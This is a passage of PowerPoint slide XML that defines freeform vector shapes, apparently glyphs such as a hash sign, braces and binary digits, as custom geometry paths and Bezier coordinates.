                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 66 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 66 h 218"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 66 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 66 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110 w 189"/>
                  <a:gd name="T65" fmla="*/ 134 h 218"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>
                  <a:gd name="T67"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 h="218">
                    <a:moveTo>
                      <a:pt x="189" y="66"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="66"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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Freeform 387"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 388"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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2" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="36"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Freeform 389"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894" y="372"/>
                <a:ext cx="83"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Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="374"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101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8" y="192"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28"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6"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Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="372"/>
                <a:ext cx="82"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Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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5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3"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Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="379"/>
                <a:ext cx="78" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 240 h 240"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 240"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 112 h 240"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 82 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 42 h 240"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 240"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 17 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 119 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 194 h 240"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 216 h 240"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 223 h 240"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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0">
                    <a:moveTo>
                      <a:pt x="64" y="240"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="240"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="138"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="111"/>
                      <a:pt x="22" y="101"/>
                      <a:pt x="22" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="14"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="17"/>
                      <a:pt x="42" y="26"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="103"/>
                      <a:pt x="35" y="115"/>
                      <a:pt x="21" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="124"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="47" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="220"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="223"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 396"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="379"/>
                <a:ext cx="77" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 240"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 240"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 240 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 240"/>
                  <a:gd name="T10" fmla="*/ 16 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 240"/>
                  <a:gd name="T12" fmla="*/ 21 w 63"/>
                  <a:gd name="T13" fmla="*/ 194 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 119 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 42 h 240"/>
                  <a:gd name="T30" fmla="*/ 41 w 63"/>
                  <a:gd name="T31" fmla="*/ 82 h 240"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 112 h 240"/>
                  <a:gd name="T34" fmla="*/ 63 w 63"/>
                  <a:gd name="T35"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0">
                    <a:moveTo>
                      <a:pt x="63" y="128"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="129"/>
                      <a:pt x="41" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="220"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="204"/>
                      <a:pt x="21" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="26"/>
                      <a:pt x="14" y="17"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="101"/>
                      <a:pt x="49" y="111"/>
                      <a:pt x="63" y="112"/>
                    </a:cubicBez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Freeform 397"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092" y="372"/>
                <a:ext cx="83" cy="246"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 201 h 201"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 201 h 201"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 201"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 37 h 201"/>
                  <a:gd name="T8" fmla="*/ 26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6"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6"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 name="Freeform 398"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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7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7"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Freeform 399"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6435" y="374"/>
                <a:ext cx="156" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101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8 h 203"/>
                  <a:gd name="T14" fmla="*/ 5 w 128"/>
                  <a:gd name="T15" fmla="*/ 147 h 203"/>
                  <a:gd name="T16" fmla="*/ 0 w 128"/>
                  <a:gd name="T17" fmla="*/ 106 h 203"/>
                  <a:gd name="T18" fmla="*/ 5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5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7" y="132"/>
                      <a:pt x="124" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="157"/>
                      <a:pt x="116" y="168"/>
                      <a:pt x="111" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="73" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="203"/>
                      <a:pt x="44" y="201"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="17" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="5" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="5" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="47"/>
                      <a:pt x="12" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="0"/>
                      <a:pt x="128" y="34"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="92" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="48"/>
                      <a:pt x="23" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="157"/>
                      <a:pt x="37" y="184"/>
                      <a:pt x="65" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92"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Freeform 400"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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1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8" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="30"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="15" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="26" y="21"/>
                      <a:pt x="31" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="16"/>
                      <a:pt x="42" y="13"/>
                      <a:pt x="47" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="6"/>
                      <a:pt x="55"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401"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781" y="374"/>
                <a:ext cx="156" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101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1" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="16" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="12" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="128" y="34"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="92"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Freeform 402"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978" y="372"/>
                <a:ext cx="83" cy="246"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 201 h 201"/>
                  <a:gd name="T2" fmla="*/ 46 w 68"/>
                  <a:gd name="T3" fmla="*/ 201 h 201"/>
                  <a:gd name="T4" fmla="*/ 46 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 201"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 37 h 201"/>
                  <a:gd name="T8" fmla="*/ 27 w 68"/>
                  <a:gd name="T9" fmla="*/ 44 h 201"/>
                  <a:gd name="T10" fmla="*/ 14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60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6" y="201"/>
                      <a:pt x="46" y="201"/>
                      <a:pt x="46" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="31"/>
                      <a:pt x="46" y="31"/>
                      <a:pt x="46" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="33"/>
                      <a:pt x="41" y="35"/>
                      <a:pt x="38" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="39"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="47" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="6"/>
                      <a:pt x="56" y="3"/>
                      <a:pt x="60"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403"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7127" y="374"/>
                <a:ext cx="156" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101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8 h 203"/>
                  <a:gd name="T14" fmla="*/ 4 w 128"/>
                  <a:gd name="T15" fmla="*/ 147 h 203"/>
                  <a:gd name="T16" fmla="*/ 0 w 128"/>
                  <a:gd name="T17" fmla="*/ 106 h 203"/>
                  <a:gd name="T18" fmla="*/ 4 w 128"/>
                  <a:gd name="T19" fmla="*/ 60 h 203"/>
                  <a:gd name="T20" fmla="*/ 17 w 128"/>
                  <a:gd name="T21" fmla="*/ 27 h 203"/>
                  <a:gd name="T22" fmla="*/ 38 w 128"/>
                  <a:gd name="T23" fmla="*/ 7 h 203"/>
                  <a:gd name="T24" fmla="*/ 66 w 128"/>
                  <a:gd name="T25" fmla="*/ 0 h 203"/>
                  <a:gd name="T26" fmla="*/ 128 w 128"/>
                  <a:gd name="T27" fmla="*/ 101 h 203"/>
                  <a:gd name="T28" fmla="*/ 105 w 128"/>
                  <a:gd name="T29" fmla="*/ 103 h 203"/>
                  <a:gd name="T30" fmla="*/ 65 w 128"/>
                  <a:gd name="T31" fmla="*/ 19 h 203"/>
                  <a:gd name="T32" fmla="*/ 23 w 128"/>
                  <a:gd name="T33" fmla="*/ 104 h 203"/>
                  <a:gd name="T34" fmla="*/ 64 w 128"/>
                  <a:gd name="T35" fmla="*/ 184 h 203"/>
                  <a:gd name="T36" fmla="*/ 105 w 128"/>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1"/>
                    </a:moveTo>
